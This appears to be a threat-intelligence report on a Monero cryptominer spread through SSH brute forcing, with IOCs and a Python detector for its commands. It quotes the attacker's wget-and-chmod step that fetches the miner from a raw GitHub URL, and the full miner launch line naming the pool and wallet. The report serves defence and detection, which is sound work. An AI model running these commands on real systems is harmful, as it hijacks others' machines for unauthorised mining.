Summary

robertreynolds2 is a cryptomining sample hosted on GitHub (the solo binary served from the robertreynolds2/solo repository).

Sample type

Cryptomining

Elkeid sample ID

elkeid_20220725_miner_2

Capture time

  • 2022-07-25

Last active

  • 2022-11-18

Known intrusion vector

  • Weak-password brute forcing

Samples involved

  • https://raw.githubusercontent.com/robertreynolds2/solo/main/solo

Main behavior

  • After brute-forcing its way in, pulls the miner binary from the GitHub raw URL and marks it executable (wget saves it under its basename, solo)

wget https://raw.githubusercontent.com/robertreynolds2/solo/main/solo && chmod +x solo

  • Connects to a mining pool and mines. The options use the same syntax as XMRig: -o pool address, -u payout wallet, -p pool password (sshs), -k keepalive, -a rx/0 (RandomX, the Monero algorithm), -t 16 worker threads, -B run in the background

./solo -o gulf.moneroocean.stream:80 -u 49Wr4g6SVqiRabVyhk5zigZXR6bNXX8H5bhMUYiSTk1ijdhB2MBDQTedNuCj27NpFG53oWpaRq8hU1qHHHFevbCsQbCTXdN -p sshs -k -a rx/0 -t 16 -B

IOC

  • sha256

3928c5874249cc71b2d88e5c0c00989ac394238747bb7638897fc210531b4aab

  • Callback IP

  • URL

    • Miner: https://raw.githubusercontent.com/robertreynolds2/solo/main/solo
    • Mining pool: gulf.moneroocean.stream
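The two stages under "Main behavior" (download from the raw GitHub URL, then a pool connection with a fixed wallet) and the IOCs above are enough for a simple process-command-line detector. The following is example code added for this write-up; it is neither part of Elkeid nor the attacker's tooling. It assumes the caller has already turned execve telemetry (Elkeid, auditd, or similar) into plain command-line strings; the sample events at the bottom are constructed, and matching any host under moneroocean.stream (not only gulf.) is an editorial choice, not something the report states.

```python
"""Detector for the robertreynolds2/solo miner: example code, not Elkeid's own."""
import hashlib
import re
import shlex
from dataclasses import dataclass

# IOCs copied from the report.
MINER_URL = "https://raw.githubusercontent.com/robertreynolds2/solo/main/solo"
POOL_HOST = "gulf.moneroocean.stream"
WALLET = "49Wr4g6SVqiRabVyhk5zigZXR6bNXX8H5bhMUYiSTk1ijdhB2MBDQTedNuCj27NpFG53oWpaRq8hU1qHHHFevbCsQbCTXdN"
SAMPLE_SHA256 = "3928c5874249cc71b2d88e5c0c00989ac394238747bb7638897fc210531b4aab"

POOL_DOMAIN = "moneroocean.stream"      # assumption: any host under this domain counts as the pool
DOWNLOADERS = {"wget", "curl"}
SHELL_SEPARATORS = {"&&", "||", "|", ";"}
MONERO_ADDR = re.compile(r"4[1-9A-HJ-NP-Za-km-z]{94}")   # standard Monero address: 95 base58 chars, leading '4'

# Option layout of the command in the report (same syntax as XMRig).
VALUE_FLAGS = {"-o": "pool", "-u": "wallet", "-p": "password", "-a": "algo", "-t": "threads"}
BOOL_FLAGS = {"-k": "keepalive", "-B": "background"}


@dataclass
class Finding:
    stage: str        # "download" or "execute"
    reasons: list
    cmdline: str


def split_commands(tokens):
    """Split a token list on shell separators, so 'wget ... && chmod +x solo' is two commands."""
    cmds, cur = [], []
    for tok in tokens:
        if tok in SHELL_SEPARATORS:
            if cur:
                cmds.append(cur)
            cur = []
        else:
            cur.append(tok)
    return cmds + [cur] if cur else cmds


def parse_miner_args(argv):
    """Extract pool/wallet/password/algo/threads and the -k/-B switches from argv."""
    out, i = {}, 1
    while i < len(argv):
        tok = argv[i]
        if tok in VALUE_FLAGS and i + 1 < len(argv):
            out[VALUE_FLAGS[tok]] = argv[i + 1]
            i += 2
            continue
        if tok in BOOL_FLAGS:
            out[BOOL_FLAGS[tok]] = True
        i += 1
    return out


def check_command(argv):
    """Return a Finding for one command, or None when nothing matches."""
    if not argv:
        return None
    prog = argv[0].rsplit("/", 1)[-1]
    cmdline = " ".join(argv)
    if prog in DOWNLOADERS and any(MINER_URL in a for a in argv[1:]):
        return Finding("download", ["known_miner_url"], cmdline)
    args = parse_miner_args(argv)
    pool = args.get("pool", "")
    host = pool.split("://")[-1].rsplit(":", 1)[0]      # strip scheme and port
    wallet = args.get("wallet", "")
    reasons = []
    if host == POOL_HOST or host.endswith("." + POOL_DOMAIN):
        reasons.append("known_pool")
    if wallet == WALLET:
        reasons.append("known_wallet")
    elif MONERO_ADDR.fullmatch(wallet):
        reasons.append("monero_address_format")   # unknown wallet, but still a Monero payout address
    if pool and args.get("algo", "").startswith("rx/"):
        reasons.append("randomx_flags")           # generic RandomX miner invocation
    return Finding("execute", reasons, cmdline) if reasons else None


def scan(cmdlines):
    """Run check_command over every command in every event line."""
    findings = []
    for line in cmdlines:
        try:
            tokens = shlex.split(line)
        except ValueError:        # unbalanced quotes: skip rather than crash the scanner
            continue
        findings += [f for f in map(check_command, split_commands(tokens)) if f]
    return findings


def sha256_matches(data: bytes) -> bool:
    """Compare file contents against the sha256 IOC from the report."""
    return hashlib.sha256(data).hexdigest() == SAMPLE_SHA256


# Constructed sample events: the two commands from the report plus benign noise.
SAMPLE_EVENTS = [
    f"wget {MINER_URL} && chmod +x solo",
    f"./solo -o {POOL_HOST}:80 -u {WALLET} -p sshs -k -a rx/0 -t 16 -B",
    "wget https://example.org/release.tar.gz",
    "ls -la /tmp",
]
```

Calling scan(SAMPLE_EVENTS) yields one download finding for the wget command and one execute finding for ./solo that carries known_pool, known_wallet and randomx_flags; the chmod, the unrelated wget and ls produce nothing. The generic reasons (monero_address_format, randomx_flags) are there so a re-hosted copy of the miner pointed at a different pool or wallet still surfaces, at the cost of needing review rather than auto-blocking.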

References

  • solo sample intel https://www.virustotal.com/gui/url/53529ffddf4a13edf3c04bfb42bcc61e73a7805c04068fc973f3bf484c64a44b/details

  • Mining pool intel https://www.virustotal.com/gui/url/f79b7f06c6c3a5e4a66602f32b7e4519dc8df566f8bf85f469db5b5cf65d9c08